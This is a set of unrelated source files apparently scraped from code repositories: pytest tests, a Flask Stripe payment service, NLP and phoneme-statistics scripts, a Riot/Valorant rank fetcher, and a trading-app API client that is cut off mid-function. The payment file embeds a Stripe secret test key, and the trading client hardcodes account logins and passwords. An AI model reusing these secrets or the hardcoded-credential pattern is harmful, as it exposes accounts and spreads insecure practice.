TestFeatureConfigHelper:\n @pytest.fixture(autouse=True)\n def setup_class(cls, tmp_path):\n feature_config_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"a\"\n dtype: STRING\n }\n transforming_features {\n index: 1\n name: \"b\"\n dependencies: \"a\"\n }\n transforming_features {\n index: 2\n name: \"c\"\n dependencies: \"a\"\n dependencies: \"b\"\n }\n transforming_features {\n index: 3\n name: \"d\"\n dependencies: \"a\"\n }\n transforming_features {\n index: 4\n name: \"e\"\n dependencies: \"c\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"feature_config_str.pbtxt\"\n write_str_to_file(feature_config_str, pb_config_path)\n cls.fm_helper = feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n def test_raise_value_error_with_invalid_indexes(self, tmp_path):\n invalid_index_pb_str = \"\"\"\n # invalid config with indexes are not continuous\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"TIME\"\n dtype: DATETIME\n }\n transforming_features {\n index: 1\n name: \"weekday\"\n dependencies: \"TIME\"\n }\n transforming_features {\n index: 1\n name: \"hour\"\n dependencies: \"TIME\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"tmp.pb\"\n write_str_to_file(invalid_index_pb_str, pb_config_path)\n with AssertRaises(ValueError) as assert_raises:\n feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n True,\n error_message.args[0].startswith(\n \"Feature indexes must be a list of increasing positive integers. \"\n \"Got indexes = [1, 1]\"\n ),\n )\n\n def test_raise_assertion_error_with_duplicate_features(self, tmp_path):\n pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"TIME\"\n dtype: DATETIME\n }\n transforming_features {\n index: 1\n name: \"weekday\"\n dependencies: \"TIME\"\n }\n transforming_features {\n index: 2\n name: \"weekday\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"tmp.pb\"\n write_str_to_file(pb_str, pb_config_path)\n with AssertRaises(AssertionError) as assert_raises:\n feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n True,\n error_message.args[0].startswith(\n \"There are duplicate objects in the list: \"\n ),\n )\n\n def test_raise_value_error_with_invalid_dependencies(self, tmp_path):\n invalid_dependency_pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"TIME\"\n dtype: DATETIME\n }\n transforming_features {\n index: 1\n name: \"weekday\"\n dependencies: \"date\"\n }\n \"\"\"\n pb_config_path = tmp_path / \"tmp.pb\"\n write_str_to_file(invalid_dependency_pb_str, pb_config_path)\n with AssertRaises(AssertionError) as assert_raises:\n feature_config_helper.FeatureConfigHelper(pb_config_path)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n True,\n error_message.args[0].startswith(\n \"Feature weekday depends on feature date that is undefined.\"\n ),\n )\n\n def test_find_dependents(self, tmp_path):\n got_1 = self.fm_helper.find_dependents(\"a\")\n expected_1 = [\"b\", \"c\", \"d\", \"e\"]\n assert_eq(expected_1, got_1)\n\n got_2 = self.fm_helper.find_dependents(\"b\")\n expected_2 = [\"c\", \"e\"]\n assert_eq(expected_2, got_2)\n\n got_3 = self.fm_helper.find_dependents(\"d\")\n expected_3 = []\n assert_eq(expected_3, got_3)\n\n def test_append_dependents(self, tmp_path):\n got = self.fm_helper.append_dependents([\"d\", \"b\"])\n expected = [\"b\", \"c\", \"d\", \"e\"]\n assert_eq(expected, got)\n\n def test_extract_config_1(self, tmp_path):\n subset_features = [\"e\"]\n expected_pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"a\"\n dtype: STRING\n }\n transforming_features {\n index: 1\n name: \"b\"\n dependencies: \"a\"\n }\n transforming_features {\n index: 2\n name: \"c\"\n dependencies: \"a\"\n dependencies: \"b\"\n }\n transforming_features {\n index: 4\n name: \"e\"\n dependencies: \"c\"\n }\n \"\"\"\n new_pb_config_path = tmp_path / \"new_tmp.pb\"\n write_str_to_file(expected_pb_str, new_pb_config_path)\n new_config = self.fm_helper.extract_config(selected_features=subset_features)\n assert_eq(parse_feature_config_pb(new_pb_config_path), new_config)\n\n def test_extract_config_2(self, tmp_path):\n subset_features = [\"d\"]\n expected_pb_str = \"\"\"\n raw_data_dir: \"dummy\"\n dataset_name: \"dummy\"\n base_features {\n name: \"a\"\n dtype: STRING\n }\n transforming_features {\n index: 3\n name: \"d\"\n dependencies: \"a\"\n }\n \"\"\"\n new_pb_config_path = tmp_path / \"new_tmp.pb\"\n write_str_to_file(expected_pb_str, new_pb_config_path)\n new_config = self.fm_helper.extract_config(selected_features=subset_features)\n assert_eq(parse_feature_config_pb(new_pb_config_path), new_config)\n\n def test_raise_value_error_with_invalid_feature_to_extract(self, tmp_path):\n subset_features = [\"a\", \"y\", \"z\"]\n with AssertRaises(ValueError) as assert_raises:\n self.fm_helper.extract_config(selected_features=subset_features)\n\n error_message = assert_raises.expected_exception_found\n assert_eq(\n error_message.args[0], \"Features ['y', 'z'] are not in the original config.\"\n )\n","sub_path":"tests/test_feature_config_helper.py","file_name":"test_feature_config_helper.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"186478266","text":"import time\nimport json\nimport sys\nimport os\nfrom flask import Flask, request, jsonify, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport requests\nfrom threading import Thread\n\n# Communication patterns:\n# Use a message-broker with 'direct' exchange to enable interaction\nimport pika\n\napp = Flask(__name__)\nCORS(app)\n\nclass PaymentItem:\n hotel_payment = {}\n\n def __init__(self):\n self.hotel_payment = {}\n\n def clear_payments(self):\n self.hotel_payment = {}\n\npayment_dict = PaymentItem()\n\n# @app.route(\"/payment\", methods=['POST'])\ndef get_payment(data):\n hotelID = data[\"hotelID\"]\n voucherID = data[\"voucherID\"]\n amount = data[\"amount\"]\n print(data)\n if hotelID in payment_dict.hotel_payment:\n payment_dict.hotel_payment[hotelID] = amount + payment_dict.hotel_payment[hotelID]\n else:\n payment_dict.hotel_payment[hotelID] = amount\n\n # print(payment_dict.hotel_payment)\n return payment_dict.hotel_payment\n\n@app.route(\"/display-payment\")\ndef stripe_payment():\n # print(payment_dict.hotel_payment)\n # payment_dict.clear_payments()\n # print(payment_dict.hotel_payment)\n payment()\n # print(payment_dict.hotel_payment)\n return payment_dict.hotel_payment\n\n@app.route(\"/get-payments\")\ndef payment():\n toReturn = []\n hostname = \"localhost\" # default broker hostname\n port = 5672 # default port\n # connect to the broker and set up a communication channel in the connection\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))\n channel = connection.channel()\n\n # set up the exchange if the exchange doesn't exist\n exchangename=\"payment_direct\"\n channel.exchange_declare(exchange=exchangename, exchange_type='direct')\n\n # prepare a queue for receiving messages\n channelqueue = channel.queue_declare(queue=\"paymenthandler\", durable=True) # 'durable' makes the queue survive broker restarts\n queue_name = channelqueue.method.queue\n channel.queue_bind(exchange=exchangename, queue=queue_name, routing_key='payment.process') # bind the queue to the exchange via the key\n\n \n method_frame, header_frame, body = channel.basic_get(queue=queue_name, auto_ack=True)\n while body != None:\n processingHotelpayment(json.loads(body))\n toReturn.append(json.loads(body))\n method_frame, header_frame, body = channel.basic_get(queue=queue_name, auto_ack=True)\n\n print(toReturn)\n return jsonify({\"vouchers\": toReturn})\n\ndef processingHotelpayment(payment):\n print(\"Processing a hotel payment:\")\n # url = \"http://127.0.0.1:5005/payment\"\n print(payment)\n hotelID = payment[0]\n voucherID = payment[1]\n amount = payment[2]\n data = {\"hotelID\": hotelID, \"voucherID\": voucherID, \"amount\": amount}\n get_payment(data)\n\n@app.route('/charge', methods=['POST'])\ndef charge():\n api_key = 'sk_test_UW031AKQAKbNym0mu9SITQAx00Ai4PhNOm'\n # data = request.get_json()\n\n try:\n token = request.form.get('stripeToken')\n\n amount = float(request.form.get('total_amount')) * 100\n\n amount = int(amount)\n\n # todo: stripe stuff\n headers = {'Authorization' : f'Bearer {api_key}'}\n data = {\n 'amount' : str(amount),\n 'currency' : 'sgd',\n 'description' : 'Another Charge',\n 'source' : token\n }\n\n r = requests.post('https://api.stripe.com/v1/charges', headers=headers, data=data)\n\n print(r.text)\n print('its ok')\n print(amount)\n # return redirect('manager.html', code,302)\n return jsonify({\"message\": \"payment successful\"}),200\n except:\n print(\"Error processing payment\")\n return jsonify({\"message\": \"An error occurred when processing the payment.\"}), 500\n\n\nif __name__ == \"__main__\": # execute this program only if it is run as a script (not by 'import')\n print(\"This is \" + os.path.basename(__file__) + \": processing payment request...\")\n app.run(port = 5005, debug = True)\n","sub_path":"payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320956039","text":"#!/usr/bin/env python3\n# -*-coding: utf-8 -*\n\n\n# ****** ****** #\n# ******** Summarize the duration of each phone ******* #\n# ********** For further phone length analysis ******** #\n# ****** ****** #\n\nimport glob, sys\nfrom math import sqrt\nfrom os import path, mkdir\nimport numpy as np\n\n##input\nhandle = sys.argv[1]\nrttm_files_path = handle+\"/rttm_output/\" ##if DNN-based forced-aligments\n##output\noutput_dir = handle+\"/durations/\"\nif not path.exists(output_dir):\n mkdir(output_dir)\n#fi\n\n#init dict which will retrieve all duration of each phone\ntotal_ms = {} \n\nwith open(output_dir+\"forced-alignment-stat.txt\", \"w\") as summary:\n\tfor file in sorted (glob.glob(rttm_files_path+\"*rttm\")):\n\t\tf=file.split('/')\n\t\tname = f[3]\n\t\tsummary.write(\"{}\\n\".format(name))\n\t\tsummary.write(\"-------------------------\\n\\n\")\n\t\tfor line in open(file):\n\t\t\tduree_ms = float(line.split(' ')[3]) #duration of the phone in milliseconds in ms\n\t\t\tlabel = line.split(' ')[4] #e.g.: t_B\n\t\t\tphoneme = label.split('_')[0].strip() #phoneme #e.g.: t\n\t\t\t#retrieval of the phonemes\n\t\t\tif phoneme not in total_ms:\n\t\t\t\ttotal_ms[phoneme]=[] #add a new entry in the dictionnary\n\t\t\t#fi\n\t\t\ttotal_ms[phoneme].append(float(duree_ms))\n\t\t\tsummary.write(\"{}:\\t{:.1f} ms\\n\".format(phoneme, duree_ms)) #write the phoneme and its corresponding duration in a readable format\n\t\t#endFor\n\t\tsummary.write(\"\\n\")\n\t#endFor --processing input file finished\n\t\n\tsummary.write(\"------------------------------------------\\n\")\n\tsummary.write(\"{:>25s}\".format(\"SUMMARY\"))\n\tsummary.write(\"\\n------------------------------------------\\n\")\n\t#writing infos in files\n\tfor phoneme, lengths in total_ms.items():\n\t\twith open(output_dir+ \"/distrib-\" + phoneme + \".txt\", \"w\") as outfile:\n\t\t\toutfile.write(\"\\n\".join([\"{:.3f}\".format(length) for length in lengths])) #write durations one by one\n\t\t\toutfile.write(\"\\n\")\n\t\t#outfile.closed\n\t\tnb_occ=len(lengths) #number of occurrence of the phoneme\n\t\t#mean_dur=sum(lengths)/nb_occ #mean duration of the phoneme in milliseconds\n\t\tmean_dur=np.mean(lengths)\n\t\tmean_dur_s=mean_dur/1000 #mean duration in seconds\n\t\t#calculation of the standard deviation\n\t\t#x=0\n\t\t#for length in lengths:\n\t\t#\tx+=(length-mean_dur)**2\n\t\t#sd=sqrt(x/nb_occ) #standard deviation of the phoneme\n\t\tsd=np.std(lengths)\n\t\tsummary.write(\"Phoneme {} appears {} times.\\n\".format(phoneme,nb_occ))\n\t\tsummary.write(\"Average length of the phoneme {} is {:.2f}, namely {:.2f} sec.\".format(phoneme,mean_dur,mean_dur_s))\n\t\tsummary.write(\"\\nStandard deviation of {} is {:.2f}.\".format(phoneme,sd))\n\t\tsummary.write(\"\\n------------------------------------------\\n\")\n\t\tprint(\"------------------------------------------\\n\")\n\t\tprint(\"SUMMARY\")\n\t\tprint(\"\\nPhoneme {} appears {} times.\\n\".format(phoneme,nb_occ))\n\t\tprint(\"Average length of the phoneme {}: {:.2f}, namely {:.2f} sec.\".format(phoneme,mean_dur,mean_dur_s))\n\t\tprint(\"Standard deviation of {} = {:.2f}\\n\".format(phoneme,sd))\n\t#endFor\n#summary.closed\n","sub_path":"stats4dnn_ali.py","file_name":"stats4dnn_ali.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"252525044","text":"#Problem:\n#On a staircase, the i-th step has some non-negative cost cost[i] assigned (0 indexed).\n#Once you pay the cost, you can either climb one or two steps.\n#You need to find minimum cost to reach the top of the floor, and you can either start from the step with index 0, or the step with index 1.\n\n#Solution:\ndef minCost(cost):\n l = len(cost)\n dp0 = dp1 = dp2 = 0\n for i in range(l):\n dp0 = cost[i] + min(dp1, dp2)\n dp2 = dp1\n dp1 = dp0\n \n return min(dp1,dp2) \n","sub_path":"Dynamic-Programming/Min-Cost-Climbing-Stairs/MinCostClimbingStairs.py","file_name":"MinCostClimbingStairs.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"476056509","text":"from django.urls import path\nfrom rest_framework import routers\nfrom . import views\nfrom utility.AppScheduler import AppScheduler\n\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n path('profile', views.user_own_profile),\n path('self/post/list', views.user_post_list),\n path('profile/edit', views.edit_profile),\n path('post/edit', views.edit_post),\n path('post/delete', views.delete_post),\n path('self/saved/post/list', views.user_saved_post_list),\n path('profile/delete', views.user_delete_profile)\n]\n\nurlpatterns += router.urls","sub_path":"user_profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"302477104","text":"# Reading the e960401 file for basic manipulation\n\nimport re\nimport math\nimport string\nfrom functools import reduce\nimport numpy as np\nimport nltk\n# This library is for a HTML Parser\nfrom bs4 import BeautifulSoup\n\n\ndef remove_characters_after_tokenization(tokens):\n '''Remove special characters, we receive tokens'''\n pattern = re.compile('[{}]'.format(re.escape(string.punctuation)))\n filtered_tokens = filter(None, [pattern.sub(' ', token)\n for token in tokens])\n return list(filtered_tokens)\n\n\ndef save_words(name, words):\n '''Save a file with a list of words, each word in a new line'''\n with open(name, \"w\") as f:\n for w in words:\n f.write(w+\"\\n\")\n\n\ndef get_context(tokens, word, window=8):\n '''Get the context or bag of words of a given word inside a text'''\n bag = []\n cl = tokens.concordance_list(word, lines=tokens.count(word))\n # tokens.concordance(word)\n for c in cl:\n left = list(c[0][-window//2:])\n right = list(c[2][:window//2])\n bag += left\n bag += right\n return list(bag)\n\n\ncorpus_root = '../../Corpus'\narticle_name = 'e960401.htm'\ntext = \"\"\n# Read the hole file\n# The test has a sample of the hole file, only one paragraph\nwith open(corpus_root+\"/\"+article_name, encoding='latin-1') as f:\n text = f.read()\n\nsoup = BeautifulSoup(text, 'lxml')\nparsedText = soup.get_text()\nparsedText = parsedText.replace('\\x97', ' ')\nfor c in string.punctuation:\n parsedText.replace(c, ' ')\n\ntokens = nltk.Text(nltk.word_tokenize(parsedText))\nprint(\"Amount of raw tokens \", len(tokens))\nstopwords = nltk.corpus.stopwords.words('spanish')\n# tokens = remove_characters_after_tokenization([\n# t.lower() for t in tokens if t.isalpha() and t.lower() not in stopwords])\n# Para usar stopwords\ntokens = remove_characters_after_tokenization([\n t.lower() for t in tokens if t.isalpha()])\ntokens = nltk.Text(tokens)\nsave_words('tokens.txt', tokens)\n\nprint(\"Amount of clean tokens without stopwords \", len(tokens))\nvocabulary = sorted(set(t.lower() for t in tokens if t.isalpha()))\nsave_words('vocabulary.txt', vocabulary)\nprint(\"Vocabulary lenght = \", len(vocabulary))\n\nprint(vocabulary[:20])\nprint(vocabulary[-20:])\n\n# Get the context, and compute the similarity between search words\n# search_words = ['empresa', 'agua', 'compañía', 'empresa']\nsearch_words = ['empresa'] + vocabulary\nvectors = []\nbags = []\nfor w in search_words:\n bag = get_context(tokens, w, 8)\n # print(\"The bag of words of '\", w, \"' is: \", bag[:8])\n # save_words('context-'+w+'.txt', bag)\n vector = [np.array([bag.count(t)/len(bag) for t in vocabulary]), 0, w]\n # print(\"The vector of \", w, \" is \", vector)\n vectors.append(vector)\n bags.append(list(bag))\n # Check if we count all items correctly\n # assert len(bag) == reduce((lambda x, y: x+y), vector)\n # assert len(bag) == vector.sum()\n\n# print(\"Vectors are \", vectors)\n\nfor i in range(1):\n for j in range(i+1, len(search_words)):\n dot = np.dot(vectors[i][0], vectors[j][0])\n mag1 = np.sqrt(vectors[i][0].dot(vectors[i][0]))\n mag2 = np.sqrt(vectors[j][0].dot(vectors[j][0]))\n sim = dot/(mag1*mag2)\n vectors[j][1] = sim\n\nvectors = sorted(vectors, key=lambda e: e[1], reverse=True)\n\nsimilarWords = []\nfor i in range(50):\n r = \"sim({}, {}) = {}\".format(search_words[0], vectors[i][2],\n vectors[i][1])\n similarWords.append(vectors[i][1])\n print(r)\n","sub_path":"09-05/similarEOWC.py","file_name":"similarEOWC.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"432779492","text":"import requests\nimport json\nimport re\nimport datetime\nimport yaml\nimport os\n\nconfigpath = os.path.dirname(__file__) + '\\\\config.yaml'\nwith open(configpath) as file:\n config = yaml.load(file, Loader=yaml.FullLoader)\n region = config['region']\n username = config['username']\n password = config['password']\n\nsession = requests.session()\n\n# Set initial headers\nheaders = {\n 'Content-type': 'application/json'\n}\n\n# Perform auth request to retrieve session cookies\nuri = 'https://auth.riotgames.com/api/v1/authorization'\ndata = {\n 'client_id': 'play-valorant-web-prod',\n 'nonce': '1',\n 'redirect_uri': 'https://playvalorant.com/opt_in',\n 'response_type': 'token id_token',\n}\ndata_json = json.dumps(data)\nresponse = session.post(uri, data=data_json, headers=headers)\n\n# Login and set Authorization header\nuri = 'https://auth.riotgames.com/api/v1/authorization'\ndata = {\n 'type': 'auth',\n 'username': username,\n 'password': password\n}\ndata_json = json.dumps(data)\nresponse = session.put(uri, data=data_json, headers=headers)\npattern = re.compile('access_token=([a-zA-Z0-9.\\-_]+)&.*id_token=([a-zA-Z0-9.\\-_]+)&.*expires_in=(\\d+)')\nauth_data = pattern.findall(response.json()['response']['parameters']['uri'])[0]\nheaders['Authorization'] = 'Bearer ' + auth_data[0]\n\n# Retrieve entitlements and set X-Riot-Entitlements-JWT header\nuri = 'https://entitlements.auth.riotgames.com/api/token/v1'\nresponse = session.post(uri, data={}, headers=headers)\nheaders['X-Riot-Entitlements-JWT'] = response.json()['entitlements_token']\n\n# Retrieve user_id\nuri = 'https://auth.riotgames.com/userinfo'\nresponse = session.get(uri, headers=headers)\nuser_id = response.json()['sub']\n\n# Request match history\nuri = f'https://pd.{region}.a.pvp.net/mmr/v1/players/{user_id}/competitiveupdates?startIndex=0&endIndex=20'\nresponse = session.get(uri, headers=headers)\n\nrank_map = {\n 0: 'UNKNOWN', 1: 'UNKNOWN 1', 2: 'UNKNOWN 2',\n 3: 'IRON 1', 4: 'IRON 2', 5: 'IRON 3',\n 6: 'BRON 1', 7: 'BRON 2', 8: 'BRON 3',\n 9: 'SILV 1', 10: 'SILV 2', 11: 'SILV 3',\n 12: 'GOLD 1', 13: 'GOLD 2', 14: 'GOLD 3',\n 15: 'PLAT 1', 16: 'PLAT 2', 17: 'PLAT 3',\n 18: 'DIAM 1', 19: 'DIAM 2', 20: 'DIAM 3',\n 21: 'IMMO 1', 22: 'IMMO 2', 23: 'IMMO 3',\n 24: 'RADIANT'\n}\n\nlevel_map = {\n 'Bonsai': 'Split',\n 'Port': 'Icebox',\n 'Triad': 'Haven',\n 'Duality': 'Bind',\n 'Ascent': 'Ascent',\n '?': '?'\n}\n\nfor match in response.json()['Matches']:\n value = match['TierProgressAfterUpdate']\n change = match['TierProgressAfterUpdate'] - match['TierProgressBeforeUpdate']\n rank = rank_map.get(match['TierAfterUpdate'])\n friendly_change = f'+{change}' if (change > 0) else f'{change}'\n friendly_time = datetime.datetime.utcfromtimestamp(match['MatchStartTime'] / 1000).strftime('%Y-%m-%d %H:%M')\n level = match['MapID'].split('/')[3] if match['MapID'] else '?'\n friendly_level = level_map.get(level)\n print(f'{friendly_time} {str.rjust(friendly_level,6)} {str.rjust(str(value),3)} ({str.rjust(friendly_change,3)}) [{rank}]')\n\ninput(\"Press enter...\")\n\n","sub_path":"elo.py","file_name":"elo.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625674021","text":"# py.test -p no:django -v\n\ndef sort(list_of_ints, descending):\n assert isinstance(list_of_ints, list)\n assert all(isinstance(x, int) for x in list_of_ints)\n if descending:\n return list(range(len(list_of_ints), 0, -1))\n else:\n return list(range(0, len(list_of_ints)))\n\n\nfrom hypothesis import given\nimport hypothesis.strategies as st\n\n\n@given(st.lists(st.integers()), st.booleans())\ndef test_ordering(values, descending):\n result = sort(values, descending)\n for i in range(0, len(result) - 1):\n if descending:\n assert result[i] >= result[i + 1]\n else:\n assert result[i] <= result[i + 1]\n","sub_path":"content/Property Based Testing/code-snippets-1/test_sorting_incorrect_passing_ordering_only_2.py","file_name":"test_sorting_incorrect_passing_ordering_only_2.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221930703","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\nimport http.client\nfrom urllib.parse import urlencode\nimport hashlib\nfrom pprint import pprint\n\nheaders = {\n 'Connection': 'Keep-Alive',\n 'User-Agent': 'okhttp/3.4.1',\n 'Content-Type': 'application/x-www-form-urlencoded',\n # 'Content-length': 209,\n 'Accept-Encoding': 'gzip',\n 'sys_deviceid': 'TA09004V1Y',\n 'sys_platform': 'android',\n 'sys_version': '',\n 'sys_versioncode': '',\n 'app_channel': '',\n 'app_versionname': ''\n}\n\napi_host = '10.82.12.25:9080'\n# 创建一个连接到主机的实例\nconn = http.client.HTTPConnection(api_host)\n\n\ndef post_request(request_url, request_data, current_headers):\n request_data = urlencode(request_data, True)\n conn.request('POST', request_url, request_data, headers=current_headers)\n return conn.getresponse().read()\n\n\n# 登录,返回登录结果\ndef log_in(username, password):\n request_url = '/trade-app-api/user/login'\n request_data = {\n 'loginname': username,\n 'password': md5_encode(password)\n }\n log_in_result = post_request(request_url, request_data, headers)\n return json.loads(log_in_result)['result']\n\n\n# md5加密\ndef md5_encode(ori_str):\n hash_md5 = hashlib.md5()\n hash_md5.update(ori_str.encode('utf-8')) # Unicode-objects must be encoded before hashing\n return hash_md5.hexdigest()\n\n# 从登录结果中提取token(session)\nbuyer_session = log_in('12000000075', '123456')['token']\nseller_session = log_in('12000000080', '123456')['token']\n\n\n# 通用接口,查看竞价分类/现货分类/品名/行业/年营业额等信息\ndef common():\n request_url = '/trade-app-api/common'\n request_data = {'version': ''}\n result = json.loads(post_request(request_url, request_data, headers))['result']\n pprint(result)\n\n\n# 获取买家或卖家特定状态的订单\ndef get_orders():\n account_type = int(input('请输入要获取买家还是卖家的订单(1-买家,2-卖家):'))\n status = int(input('请输入要获取订单的状态(1-全部,9-待签章,2-待支付,3-待交收,4-待确认):'))\n request_url = '/trade-app-api/order/list'\n request_data = {\n # 1-全部 2-待支付 3-待交收 4-待确认交收完成 5-已完成 6-待评价 7-异议中 8-已关闭\n # 9-待签章 10-待付款(含待签章9,待支付2) 11-已付款(含待交收3,待确认4,异议中7) 12-已完成(含已完成,待评价)\n 'status': status,\n 'type': account_type,\n 'pageNo': 1,\n 'pageSize': 12\n }\n if account_type == 1:\n headers.update({'app_session': buyer_session})\n elif account_type == 2:\n headers.update({'app_session': seller_session})\n result = post_request(request_url, request_data, headers)\n orders = json.loads(result)['result']\n return orders\n\n\n# 获取卖家已上架的非竞价商品列表\ndef get_my_goods():\n goods_id = []\n request_url = '/trade-app-api/mine/product/list'\n request_data = {\n 'pageNo': 1,\n 'pageSize': 12\n }\n headers.update({'app_session': seller_session})\n result = json.loads(post_request(request_url, request_data, headers))['result']\n pprint(result)\n for i in range(len(result)):\n if result[i]['quotedStatus'] == '5' and result[i]['bidType'] != '3': # 挂牌状态(5-已上架,8-暂停销售)\n goods_id.append(result[i]['id'])\n if len(goods_id) != 0:\n print('获取卖家已上架商品列表成功!')\n return goods_id\n\n\n# 添加商品到买家购物车\ndef add_to_cart(good_id):\n request_url = '/trade-app-api/shopping/add'\n request_data = {\n 'id': good_id\n }\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n print(json.loads(result)['msg'])\n\n\n# 获取买家的购物车列表,以列表形式返回商品的购物车id\ndef get_cart_list():\n send_type = int(input('请输入要获取哪种配送方式的购物车列表(1-买方自提,2-卖方配送-款到发货,3-卖方配送-货到付款):'))\n goods_cart_id = []\n request_url = '/trade-app-api/shopping/list'\n request_data = {\n 'sendType': send_type\n }\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n goods_list = json.loads(result)['result']\n for company in goods_list:\n for good in company['goodsList']:\n goods_cart_id.append(good['id'])\n if len(goods_cart_id) != 0:\n print('获取买家选定配送方式的购物车列表成功!')\n return goods_cart_id, send_type\n\n\n# 去结算,提交订单前一步,可不用\ndef to_purchase(goods_cart_id):\n request_url = '/trade-app-api/order/account'\n # if submit_type == '1': # 一个一个的去结算\n request_data = {\n 'cartId': goods_cart_id\n }\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n return json.loads(result)['result']\n\n\n# 获取买家默认收货地址\ndef get_default_receiving_address():\n request_url = '/trade-app-api/address/get-default'\n request_data = {}\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n default_address_id = json.loads(result)['result']['id']\n if default_address_id is None:\n new_address()\n default_address_id = get_default_receiving_address()\n else:\n print('已获取买家默认收货地址')\n return default_address_id\n\n\n# 获取卖家首个发货地址\ndef get_first_sending_address():\n request_url = '/trade-app-api/address/list'\n request_data = {'type': 1} # 0-收货地址,1-发货地址\n headers.update({'app_session': seller_session})\n result = post_request(request_url, request_data, headers)\n address_list = json.loads(result)['result']\n first_sending_address = address_list[0]['id']\n if len(address_list) == 0:\n print('请创建一个发货地址(1)')\n new_address()\n first_sending_address = get_first_sending_address()\n else:\n print('已获取卖家首个发货地址')\n return first_sending_address\n\n\n# 创建买家的新的收货地址(当买家没有地址时调用)\ndef new_address():\n request_url = '/trade-app-api/address/update'\n address_type = int(input('请输入要创建收货地址(0),还是发货地址(1):'))\n request_data = {\n 'company': '测试有限公司',\n 'address': '天府三街1234号',\n 'area': '四川省成都市',\n 'province': '26',\n 'city': '355',\n 'country': '2796',\n 'phone': '13408620260',\n 'user': '郑zmm',\n 'checked': False,\n 'id': 0,\n 'type': address_type\n }\n if address_type == 1:\n request_data.update({'storeAddress': '测试成都库'})\n headers.update({'app_session': seller_session})\n elif address_type == 0:\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n if '保存成功' in json.loads(result)['msg']:\n print('创建新的 ' + ('发货' if address_type == 1 else '收货') + ' 地址成功!')\n\n\n# 提交订单,需要先获取商品的购物车id和默认地址id\ndef submit_order(goods_cart_id, address_id, send_type):\n if int(send_type) == 1:\n pay_type = int(input('请输入希望的支付方式(0-线下付款,1-线上支付):'))\n else:\n pay_type = 1\n request_url = '/trade-app-api/order/add'\n request_data = {\n 'cartId': goods_cart_id,\n 'addressid': address_id,\n 'payType': pay_type # 0-线下付款,1-线上支付(针对“买方自提”的交收方式的商品)\n }\n\n print('正在提交订单,支付方式为' + ('“线下付款”' if pay_type == 0 else '“线上支付”'))\n headers.update({'app_session': buyer_session})\n result = post_request(request_url, request_data, headers)\n if len(json.loads(result)['result']) != 0:\n print('提交订单成功!')\n\n\n# 从获取卖方上架商品,加入购物车,到提交订单\ndef submit_order_package():\n for good_id in get_my_goods():\n add_to_cart(good_id)\n cart_list = get_cart_list()\n goods_card_id = cart_list[0]\n send_type = cart_list[1]\n address_id = get_default_receiving_address()\n submit_order(goods_card_id, address_id, send_type)\n\n\n# 商品挂牌\ndef submit_good():\n request_url = '/trade-app-api/mine/product/modify'\n bid_type = int(input('请输入商品的交易方式(1:洽谈,2:一口价,3:竞价,4:钢厂直销):'))\n send_type = int(input('请输入商品的配送方式(1-买方自提,2-卖方配送-款到发货,3-卖方配送-货到付款):'))\n sign_mode = int(input('请输入商品的签章方式(1-自动签章,2-手动签章):'))\n address_id = get_first_sending_address()\n request_data = {\n 'bidType': bid_type, # 交易方式\n 'smallTypeId': '0bf5e824da164743a109eec113fd9533', # 小类(品种)id\n 'specName': 'xx@oo', # 规格名\n 'brandId': 'fb22b24cee444d0483b57a7a452e29c7', # 品名id\n 'materialName': 'oo@xx', # 材质名\n 'factoryId': 'fb53e3c6a7554edfb4929bb3e67232d9', # 钢厂id\n 'difference': '/*-+', # 负差\n 'measurementType': 2, # 计量方式(1:理计,2:过磅)\n 'amount': 22, # 总量=挂牌发盘数量+单位\n 'price': 1.5, # 单价(元)\n 'minBuy': 2, # 最小起订量\n 'sendType': send_type, # 配送方式\n 'addressId': address_id, # 存货地址Id\n 'united': '8b99cdcee2c643849a05323405ff6bc4', # 单位id\n 'signMode': sign_mode,\n 'quotedStatus': 5, # 挂牌状态(1:待提交,2:待支付保证金,5:已上架,8:暂停销售)\n }\n if bid_type in (1, 2):\n 